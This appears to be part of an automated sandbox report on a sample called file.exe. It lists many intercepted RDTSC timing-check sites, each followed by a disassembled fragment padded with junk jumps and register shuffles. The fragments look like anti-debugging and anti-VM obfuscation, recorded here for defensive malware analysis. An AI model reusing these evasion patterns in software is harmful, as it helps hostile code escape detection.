              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E0424 second address: 52E0454 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov di, 20C4h 0x0000000f mov eax, ebx 0x00000011 popad 0x00000012 xchg eax, ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007EFFACBF2F92h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E0454 second address: 52E0508 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b jmp 00007EFFAC79DCD4h 0x00000010 mov bh, ch 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007EFFAC79DCD8h 0x0000001c add ecx, 794A3A38h 0x00000022 jmp 00007EFFAC79DCCBh 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007EFFAC79DCD8h 0x0000002e sub esi, 2D2F3498h 0x00000034 jmp 00007EFFAC79DCCBh 0x00000039 popfd 0x0000003a popad 0x0000003b pushfd 0x0000003c jmp 00007EFFAC79DCD8h 0x00000041 sbb cx, DEF8h 0x00000046 jmp 00007EFFAC79DCCBh 0x0000004b popfd 0x0000004c popad 0x0000004d xchg eax, esi 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E0508 second address: 52E050C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E050C second address: 52E0527 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E0527 second address: 52E052D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E052D second address: 52E056C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-04h] 0x0000000b jmp 00007EFFAC79DCD7h 0x00000010 nop 0x00000011 jmp 00007EFFAC79DCD6h 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E056C second address: 52E0572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E0572 second address: 52E0577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E0577 second address: 52E05D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov bl, ah 0x0000000d pushfd 0x0000000e jmp 00007EFFACBF2F99h 0x00000013 sub al, 00000016h 0x00000016 jmp 00007EFFACBF2F91h 0x0000001b popfd 0x0000001c popad 0x0000001d push dword ptr [ebp+08h] 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E05D1 second address: 52E05D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E05D5 second address: 52E05DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E0628 second address: 52E0677 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007EFFAC79DCD8h 0x00000008 adc ax, C928h 0x0000000d jmp 00007EFFAC79DCCBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 cmp dword ptr [ebp-04h], 00000000h 0x0000001a pushad 0x0000001b mov ebx, esi 0x0000001d jmp 00007EFFAC79DCD0h 0x00000022 popad 0x00000023 mov esi, eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E0677 second address: 52E067B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E067B second address: 52E0681 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D0052 second address: 52D0056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D0056 second address: 52D005A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D005A second address: 52D0060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D0060 second address: 52D008B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 mov edi, 3E65832Ah 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push FFFFFFFEh 0x0000000f jmp 00007EFFAC79DCD1h 0x00000014 push 307C7249h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D008B second address: 52D008F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D008F second address: 52D0093 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D0093 second address: 52D0099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D0099 second address: 52D0100 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007EFFAC79DCD1h 0x00000009 xor cx, C406h 0x0000000e jmp 00007EFFAC79DCD1h 0x00000013 popfd 0x00000014 mov esi, 2442A3B7h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xor dword ptr [esp], 45D6EC01h 0x00000023 jmp 00007EFFAC79DCCAh 0x00000028 call 00007EFFAC79DCC9h 0x0000002d jmp 00007EFFAC79DCD0h 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 push ecx 0x00000037 pop ebx 0x00000038 pushad 0x00000039 popad 0x0000003a popad 0x0000003b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D0100 second address: 52D0154 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007EFFACBF2F95h 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007EFFACBF2F91h 0x0000000f jmp 00007EFFACBF2F8Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007EFFACBF2F94h 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D0154 second address: 52D015A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D015A second address: 52D0175 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007EFFACBF2F8Fh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D0175 second address: 52D019F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov dx, cx 0x00000013 mov dh, al 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D019F second address: 52D021C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 1D5Dh 0x00000007 pushfd 0x00000008 jmp 00007EFFACBF2F8Ah 0x0000000d and eax, 54C739B8h 0x00000013 jmp 00007EFFACBF2F8Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pop eax 0x0000001d pushad 0x0000001e mov si, 7A0Bh 0x00000022 mov dx, si 0x00000025 popad 0x00000026 mov eax, dword ptr fs:[00000000h] 0x0000002c pushad 0x0000002d jmp 00007EFFACBF2F98h 0x00000032 pushfd 0x00000033 jmp 00007EFFACBF2F92h 0x00000038 sbb esi, 74A95E78h 0x0000003e jmp 00007EFFACBF2F8Bh 0x00000043 popfd 0x00000044 popad 0x00000045 nop 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b popad 0x0000004c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D021C second address: 52D0222 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D0222 second address: 52D0228 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D0228 second address: 52D022C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D022C second address: 52D0230 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D0230 second address: 52D0253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov di, 4A84h 0x0000000e jmp 00007EFFAC79DCCDh 0x00000013 popad 0x00000014 nop 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D0253 second address: 52D0257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D0257 second address: 52D026A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCCFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D026A second address: 52D0282 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFFACBF2F94h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D0282 second address: 52D02BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub esp, 18h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007EFFAC79DCCBh 0x00000017 jmp 00007EFFAC79DCD3h 0x0000001c popfd 0x0000001d mov ax, 492Fh 0x00000021 popad 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D02BE second address: 52D03EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b pushad 0x0000000c movzx esi, di 0x0000000f pushfd 0x00000010 jmp 00007EFFACBF2F8Fh 0x00000015 add ecx, 0978291Eh 0x0000001b jmp 00007EFFACBF2F99h 0x00000020 popfd 0x00000021 popad 0x00000022 pushfd 0x00000023 jmp 00007EFFACBF2F90h 0x00000028 jmp 00007EFFACBF2F95h 0x0000002d popfd 0x0000002e popad 0x0000002f push eax 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007EFFACBF2F97h 0x00000037 sbb cl, FFFFFF8Eh 0x0000003a jmp 00007EFFACBF2F99h 0x0000003f popfd 0x00000040 mov bl, ah 0x00000042 popad 0x00000043 xchg eax, ebx 0x00000044 jmp 00007EFFACBF2F93h 0x00000049 xchg eax, esi 0x0000004a pushad 0x0000004b pushfd 0x0000004c jmp 00007EFFACBF2F94h 0x00000051 adc ch, 00000068h 0x00000054 jmp 00007EFFACBF2F8Bh 0x00000059 popfd 0x0000005a pushfd 0x0000005b jmp 00007EFFACBF2F98h 0x00000060 sub ax, 0FC8h 0x00000065 jmp 00007EFFACBF2F8Bh 0x0000006a popfd 0x0000006b popad 0x0000006c push eax 0x0000006d push eax 0x0000006e push edx 0x0000006f jmp 00007EFFACBF2F94h 0x00000074 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D03EC second address: 52D03FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFFAC79DCCEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D03FE second address: 52D0402 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D0402 second address: 52D04C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a jmp 00007EFFAC79DCCDh 0x0000000f call 00007EFFAC79DCD0h 0x00000014 call 00007EFFAC79DCD2h 0x00000019 pop eax 0x0000001a pop edi 0x0000001b popad 0x0000001c xchg eax, edi 0x0000001d pushad 0x0000001e movzx ecx, bx 0x00000021 mov ecx, edi 0x00000023 popad 0x00000024 push eax 0x00000025 pushad 0x00000026 mov edi, esi 0x00000028 mov eax, 6592AD73h 0x0000002d popad 0x0000002e xchg eax, edi 0x0000002f jmp 00007EFFAC79DCD6h 0x00000034 mov eax, dword ptr [75AB4538h] 0x00000039 jmp 00007EFFAC79DCD0h 0x0000003e xor dword ptr [ebp-08h], eax 0x00000041 pushad 0x00000042 pushad 0x00000043 pushad 0x00000044 popad 0x00000045 call 00007EFFAC79DCCAh 0x0000004a pop esi 0x0000004b popad 0x0000004c pushfd 0x0000004d jmp 00007EFFAC79DCCBh 0x00000052 sbb cx, C8EEh 0x00000057 jmp 00007EFFAC79DCD9h 0x0000005c popfd 0x0000005d popad 0x0000005e xor eax, ebp 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 mov di, 564Eh 0x00000067 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D04C4 second address: 52D0576 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007EFFACBF2F8Fh 0x00000008 xor ah, FFFFFFFEh 0x0000000b jmp 00007EFFACBF2F99h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007EFFACBF2F8Eh 0x0000001a jmp 00007EFFACBF2F95h 0x0000001f popfd 0x00000020 call 00007EFFACBF2F90h 0x00000025 pop esi 0x00000026 popad 0x00000027 popad 0x00000028 push esi 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c call 00007EFFACBF2F93h 0x00000031 pop esi 0x00000032 pushfd 0x00000033 jmp 00007EFFACBF2F99h 0x00000038 and ch, FFFFFFA6h 0x0000003b jmp 00007EFFACBF2F91h 0x00000040 popfd 0x00000041 popad 0x00000042 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D0576 second address: 52D0599 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ah, dh 0x00000011 mov eax, 213390DBh 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D0599 second address: 52D059F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D059F second address: 52D0632 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-10h] 0x0000000e pushad 0x0000000f mov bx, cx 0x00000012 movzx ecx, bx 0x00000015 popad 0x00000016 mov dword ptr fs:[00000000h], eax 0x0000001c jmp 00007EFFAC79DCD3h 0x00000021 mov dword ptr [ebp-18h], esp 0x00000024 jmp 00007EFFAC79DCD6h 0x00000029 mov eax, dword ptr fs:[00000018h] 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov esi, ebx 0x00000034 pushfd 0x00000035 jmp 00007EFFAC79DCD9h 0x0000003a sub si, F586h 0x0000003f jmp 00007EFFAC79DCD1h 0x00000044 popfd 0x00000045 popad 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D0632 second address: 52D0637 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D0637 second address: 52D06AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, 1710h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, dword ptr [eax+00000FDCh] 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007EFFAC79DCD5h 0x00000018 sbb eax, 75A09D96h 0x0000001e jmp 00007EFFAC79DCD1h 0x00000023 popfd 0x00000024 pushfd 0x00000025 jmp 00007EFFAC79DCD0h 0x0000002a jmp 00007EFFAC79DCD5h 0x0000002f popfd 0x00000030 popad 0x00000031 test ecx, ecx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 mov bx, 4F7Eh 0x0000003a mov bl, E5h 0x0000003c popad 0x0000003d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D06AB second address: 52D06CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 push ebx 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007EFFACBF2FC5h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007EFFACBF2F90h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D06CD second address: 52D06D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D06D3 second address: 52D06D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C023F second address: 52C0250 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0250 second address: 52C026D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov dh, ch 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ecx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C026D second address: 52C0282 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007EFFAC79DCCAh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0282 second address: 52C02D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 3B03h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a sub esp, 2Ch 0x0000000d pushad 0x0000000e mov ebx, ecx 0x00000010 movzx eax, di 0x00000013 popad 0x00000014 push ebp 0x00000015 jmp 00007EFFACBF2F98h 0x0000001a mov dword ptr [esp], ebx 0x0000001d pushad 0x0000001e push edx 0x0000001f mov bl, ah 0x00000021 pop ebx 0x00000022 popad 0x00000023 xchg eax, edi 0x00000024 jmp 00007EFFACBF2F90h 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C02D0 second address: 52C02D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C02D4 second address: 52C02F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F98h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0427 second address: 52C042B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C047F second address: 52C049B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C049B second address: 52C049F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C049F second address: 52C04A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C04A3 second address: 52C04A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C04A9 second address: 52C04D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, E297h 0x00000007 push eax 0x00000008 pop edx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007EFFACBF2F99h 0x00000012 nop 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 mov esi, 6D1EB949h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0516 second address: 52C051C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C051C second address: 52C0520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0520 second address: 52C053B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C053B second address: 52C0541 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0541 second address: 52C0575 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F001CF3BBFBh 0x0000000f pushad 0x00000010 movsx edi, cx 0x00000013 popad 0x00000014 js 00007EFFAC79DD16h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007EFFAC79DCCBh 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0575 second address: 52C0680 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-14h], edi 0x0000000c pushad 0x0000000d mov ax, 1873h 0x00000011 mov eax, 2587C8CFh 0x00000016 popad 0x00000017 jne 00007F001D390E81h 0x0000001d jmp 00007EFFACBF2F92h 0x00000022 mov ebx, dword ptr [ebp+08h] 0x00000025 pushad 0x00000026 call 00007EFFACBF2F8Eh 0x0000002b pushad 0x0000002c popad 0x0000002d pop ecx 0x0000002e jmp 00007EFFACBF2F91h 0x00000033 popad 0x00000034 lea eax, dword ptr [ebp-2Ch] 0x00000037 pushad 0x00000038 jmp 00007EFFACBF2F8Ch 0x0000003d jmp 00007EFFACBF2F92h 0x00000042 popad 0x00000043 xchg eax, esi 0x00000044 pushad 0x00000045 mov si, 9C4Dh 0x00000049 pushad 0x0000004a jmp 00007EFFACBF2F98h 0x0000004f pushfd 0x00000050 jmp 00007EFFACBF2F92h 0x00000055 sub eax, 1FC7D1C8h 0x0000005b jmp 00007EFFACBF2F8Bh 0x00000060 popfd 0x00000061 popad 0x00000062 popad 0x00000063 push eax 0x00000064 jmp 00007EFFACBF2F99h 0x00000069 xchg eax, esi 0x0000006a jmp 00007EFFACBF2F8Eh 0x0000006f nop 0x00000070 push eax 0x00000071 push edx 0x00000072 push eax 0x00000073 push edx 0x00000074 jmp 00007EFFACBF2F8Ah 0x00000079 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0680 second address: 52C068F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C068F second address: 52C06BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007EFFACBF2F8Ch 0x00000011 rdtsc
